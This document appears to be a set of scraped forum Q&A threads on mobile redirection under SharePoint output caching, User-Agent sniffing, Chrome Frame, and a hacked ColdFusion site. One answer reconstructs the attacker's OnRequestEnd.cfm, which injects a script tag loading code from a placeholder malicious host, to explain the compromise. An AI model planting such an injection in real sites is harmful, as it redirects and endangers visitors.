We're building a mobile-friendly site to work in tandem with our client's MOSS 2007 internet site. We need to be able to redirect users who hit the home page and are using a mobile device.
Our original intention was to add a custom control to the home page's page layout that would detect the current user's device and redirect to the mobile site accordingly. We quickly realised that this would not work because we are using the output caching functionality provided by SharePoint/ASP.NET, which means the detection code only runs for the first visitor to the home page and not again until the cache expires.
Our next idea was to build a custom HTTP Module and do the detection there. However, we are finding that output caching does not allow that either: if the cache is populated while a mobile device is visiting, all browsers are subsequently redirected to the mobile site (until the cache expires).
If we turn off output caching it works just fine, but we cannot turn output caching off, especially for the home page. We did investigate Substitution (Donut) Caching, but that does not work for us because we are already filtering the ASP.NET response within another HTTP Module that tidies up the rendered HTML for XHTML compatibility reasons. I've also experimented with setting the output cache profile's vary-by-header property to "User-Agent", but I am getting mixed results, and since that caches a separate copy of the page for every distinct User-Agent string (and mobile UA strings vary enormously), I'm also concerned about the memory implications of caching multiple versions of pages (we already have memory issues now and then).
We could run the redirection code in JavaScript, but then we risk missing the many devices that don't have JavaScript enabled. This is a government website, so any use of JavaScript has to abide by accessibility guidelines.
Does anyone have any other ideas as to how we can solve this? Has anyone done this before, perhaps in a different way?
Hope you can help, thanks.
p.s. I have also asked this question on SharePoint.SE but wanted to get as many eyes on this as possible.
I would suggest you try an ISAPI filter. ISAPI filters run in IIS before the request reaches the ASP.NET pipeline, so they can inspect the User-Agent header and issue the redirect before output caching gets involved.
I've actually solved this one, I think. I pretty much followed this article: http://msdn.microsoft.com/en-us/library/ms550239.aspx. We updated the code in that article to build a cache key based on whether the current page is the home page, whether the current user is on a mobile device, and whether a cookie exists forcing the user to the full site. I will probably write this up as a blog post; when I do, I will update this answer with a link.
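The heart of it is overriding GetVaryByCustomString so the output cache keeps separate entries per device class. A minimal sketch of the idea (the class name, cookie name, and home-page path below are my own illustrative assumptions, not the article's exact code):

    // Global.asax code-behind. In SharePoint the application class
    // derives from SPHttpApplication rather than plain HttpApplication.
    using System;
    using System.Web;
    using Microsoft.SharePoint.ApplicationRuntime;

    public class MobileAwareHttpApplication : SPHttpApplication
    {
        public override string GetVaryByCustomString(HttpContext context, string custom)
        {
            if (string.Equals(custom, "MobileHomePage", StringComparison.OrdinalIgnoreCase))
            {
                bool isHomePage = string.Equals(context.Request.Url.AbsolutePath,
                    "/Pages/default.aspx", StringComparison.OrdinalIgnoreCase);
                bool isMobile = context.Request.Browser.IsMobileDevice;
                bool forceFullSite = context.Request.Cookies["fullSite"] != null;

                // Distinct strings produce distinct cache entries, so a mobile
                // visitor can never poison the copy served to desktop browsers.
                return string.Format("home={0}|mobile={1}|full={2}",
                    isHomePage, isMobile, forceFullSite);
            }
            return base.GetVaryByCustomString(context, custom);
        }
    }

The cache profile for the page then needs its vary-by-custom setting pointed at that same "MobileHomePage" string, otherwise the override is never consulted.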
Does anybody have the same problem? We have a new extension with a verified domain and inline install enabled, but clicking the button that calls chrome.webstore.install() causes a redirect to the Chrome Web Store with the GET parameter ?utm_source=inline-install-disabled.
I recently received the following email from Chrome Web Store Developer Support:
In addition to the existing extension-level protection, our expanded enforcement will also use machine learning to evaluate each inline installation request for signals of deceptive, confusing, or malicious ads or webpages. When we find those signals, we'll selectively disable that one inline installation request and redirect the user to the extension's page on the Chrome Web Store. This selective enforcement will not impact inline installation of that extension from other, non-deceptive sources. Developers will not be notified of this enforcement, as it happens on an as-needed basis.
Are you serving any ads on your site, or doing anything else that might be perceived as a grey area by the machine-learning system?
If you're being blatantly deceptive, it would appear that you've been found out. If not, and you're genuinely confused, a possible first step would be to strip your site of any ads or injected content altogether, to see if you're able to regain Google's trust.
I have read several articles on feature detection saying that it is more reliable than browser detection because browsers lie.
I couldn't find any information on why they lie. Does anyone know the reason why they would do that?
As far as I understand it, webmasters do browser sniffing to find the capabilities of a browser and limit what they send to it. If a browser lies about its capabilities, it will receive more from the webmaster. You can read more here:
http://farukat.es/journal/2011/02/499-lest-we-forget-or-how-i-learned-whats-so-bad-about-browser-sniffing
http://webaim.org/blog/user-agent-string-history/
The reason is simple:
Because web sites look at the user agent string and make assumptions about the browser, which are then invalid when the browser is updated to a new version.
This has been going on almost since the beginning of the web. Browser vendors don't want their new versions to break the web, so they tweak the UA string to fool the code on existing sites.
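You can see the accumulated lies in any UA string. For example (a real IE8 string, and a recent Chrome one):

    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

IE claims to be Mozilla so that Netscape-era sniffing code would serve it the "good" content, and Chrome claims to be Mozilla, AppleWebKit, KHTML, Gecko, and Safari all at once, so that sniffers written for each of those engines keep working.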
Ultimately, if everyone used the UA string responsibly and updated their sites whenever new browser versions come out, then browsers wouldn't need to lie. But you have to admit, that's asking quite a lot.
Feature detection works better because when a new browser version ships with that feature, the detection picks it up automatically, without either the browser vendor or the site owner needing to do anything special.
Of course, there are times when feature detection doesn't work perfectly -- e.g. when a feature exists but has bugs in a particular browser. In that case, yes, you may want to fall back to browser detection. But in most cases, feature detection is a much better option.
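To make the contrast concrete, here is a minimal sketch of feature detection (geolocation is just an arbitrary example feature):

    // Test for the capability itself instead of guessing from the UA string.
    if ("geolocation" in navigator) {
        navigator.geolocation.getCurrentPosition(function (pos) {
            console.log(pos.coords.latitude, pos.coords.longitude);
        });
    } else {
        // Degrade gracefully, e.g. ask the user to type in a location instead.
    }

This works unchanged in every past and future browser that ships the feature, which is exactly why it beats parsing version numbers out of the UA string.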
Another, more modern reason for users to change the UA string is to dodge demands to install mobile apps (where product owners control what I can and can't do with the content. No thanks!).
Today Reddit started blocking the viewing of subreddits whenever it detects a mobile browser in the User-Agent, so I had to change mine just to be able to view the content.
I'm working on a project for class: to create a website and a companion website for mobile users. The site is to recognize the type of device/browser accessing the page and send the appropriate form. So if I visit the site in IE8 it will direct me to the main page for IE8, and if I access the site with a mobile device it will direct me to the mobile main page automatically.
Also, I need to design the website for at least two different screen sizes.
I'm coding in HTML5, I do not know the type of server the site will be hosted on. The use of Javascript is extra credited. The project details are to "design a small mobile web site. The web site should be tested on one or more mobile devices. The iPod Touch device will be used as the base for testing."
I know how to do 8/10 of the requirements (except the two mentioned). I looked at W3C and didn't find anything.
Any help would be much appreciated. Thank you!
Do a Google search for:
CSS Browser Detection
JavaScript Browser Detection
Also, you should think twice about creating multiple sites with basically the same content; consider instead creating proper stylesheets that are referenced from a single site (see the media-query sketch below).
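For example, a single page can serve two screen sizes with media queries instead of a second site (a minimal sketch; the 480px breakpoint is an arbitrary choice):

    /* Default (desktop) rules. */
    body { font-size: 100%; }

    /* Overrides applied only on small screens. */
    @media screen and (max-width: 480px) {
        body { font-size: 90%; }
        #sidebar { display: none; }
    }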
Hope that gets you the other 2 requirements.
NOTE: Since this is homework I won't post any links...
I suspect that ServerFault isn't the best place for this question... but aside from that, your question is a little vague. A Google search for "designing a mobile website" turns up what looks to be several pages of relevant information. If you first try working with the information in those documents and then come back with specific questions (e.g., "I tried this and it behaved this way instead of the way I expected"), you're apt to get better answers.
I was thinking of always adding the meta tag to all of my websites. That will trigger Google Chrome Frame to load for users who have already installed it. I can see the benefits, but are there any concerns or facts that I should know before I do that?
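For reference, the tag I mean is the Chrome Frame opt-in:

    <meta http-equiv="X-UA-Compatible" content="chrome=1">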
Is testing in Google Chrome enough, or is testing in Google Chrome Frame explicitly required?
Thanks
Note: please do not mention the currently known "print" and "download" issues. I'm sure those will get fixed soon :)
The only argument against Chrome Frame that I have seen so far is Microsoft's: "Google Chrome Frame running as a plugin has doubled the attack area for malware and malicious scripts."
Also, you may run into problems with frames: if you have Chrome Frame on your page and someone iframes that page on their site, things can break. More info:
http://groups.google.com/group/google-chrome-frame/browse_thread/thread/d5ffe442658bc60e/e6d7a4c1c179c931?lnk=gst&q=iframe
You should only need to test in Chrome Frame for (X)HTML, CSS, and JavaScript... basic stuff. If you are using AJAX (while trying not to break the back button), or are worried about caching, cookies (accessed via JavaScript), or other potentially browser-specific interactions, I suggest testing on the IE+CF platform... at least until the CF team announces 100% interoperability between CF and IE.
Check out the CF Google group for more issues.
Are there any concerns or facts you should know? Yes: Not everyone has Google Chrome Frame installed.
You are adding a new user agent that you will need to test and debug against, without removing the need to test and debug the user experience for other browsers (notably plain IE by itself).
If you don't make the IE user experience equivalent to the Google Chrome experience, then you are alienating a significant percentage of users. Depending on your website and its expected users, the impact of this may range from undesirable to unacceptable. If you do make the user experience equivalent, then there is no point in adding the meta tag.
A couple sites of mine recently got "hacked". Someone was able to add a line of JavaScript to the bottom of every page on the site.
The server is Windows Server 2003, with ColdFusion 8 and MySQL 5.x installed and running.
Looking into the code on each page shows that none of the pages were modified. The JavaScript is not in the code files themselves. This leads me to believe it is an IIS problem, but I am unsure and cannot find anything that would be able to do this within IIS.
The JavaScript being added redirects a user to another page only when they come from Google, or at least it appears to work this way.
Any help on how someone was able to accomplish this as well as removing it would be greatly appreciated.
Another way to word the question, thanks to @Jeffrey Hantin:
How do you systematically modify output from IIS without modifying individual pages?
EDIT: A bit more testing has shown that only the .cfm pages add the extra JavaScript. I added a new .cfm page and the JS was there, but a .html page did not have it.
EDIT 2: Turns out to have been a ColdFusion problem after all. Somehow OnRequestEnd.cfm pages were created on the sites, and they appended that JS.
Looks like someone exploited one of the recent Adobe ColdFusion vulnerabilities.
Please see these blog posts for details, and try to search for these symptoms on your server:
Image upload
FCKEditor bug + this post
Hope this helps.
Turns out to have been a ColdFusion problem after all. OnRequestEnd.cfm pages were created on the sites, and they appended that JS.
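For anyone else cleaning this up: ColdFusion automatically runs OnRequestEnd.cfm (the companion file to Application.cfm) at the end of every .cfm request and appends its output to the response, which is why only the .cfm pages were affected. The injected file presumably amounted to something like this (the URL is a made-up placeholder):

    <!--- OnRequestEnd.cfm: executed after every .cfm request in the directory tree;
          whatever it outputs is appended to the page --->
    <cfoutput><script type="text/javascript" src="http://evil.example.com/redirect.js"></script></cfoutput>

Deleting the rogue OnRequestEnd.cfm files (and closing whatever hole let them be written) removes the script.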
If you only want to use IIS to modify output, an ISAPI filter is probably the best answer. If you would like to use ColdFusion, you could use Application.cfc to modify output during certain parts of the request cycle, or wrap all of your pages in a custom tag to consolidate the shared portions of your page templates (see the sketch below).
I have used both. In cases where my page headers and footers are all the same, the custom tag is fast and easy to use; to make changes to all the pages, you edit one custom tag file. In cases where I have a more complicated web application, I'll use Application.cfc to store and insert common components where they are needed.
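A minimal sketch of the Application.cfc route (the application name and footer template are illustrative assumptions):

    <!--- Application.cfc: append shared markup at the end of every request --->
    <cfcomponent output="false">
        <cfset this.name = "mySite">

        <cffunction name="onRequestEnd" returnType="void" output="true">
            <cfargument name="targetPage" type="string" required="true">
            <!--- Runs after every page; its output is appended to the response --->
            <cfinclude template="commonFooter.cfm">
        </cffunction>
    </cfcomponent>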
They might have guessed your password. You should change it immediately.
It's possible that an ISAPI filter is used to do this. I once used one myself to perform compression before IIS supported it natively.
In your specific situation, you may want to check for ISAPI filters you don't want installed. Of course, if your server has been compromised, you will likely be better off rebuilding from a known good image rather than trying to fix it in situ.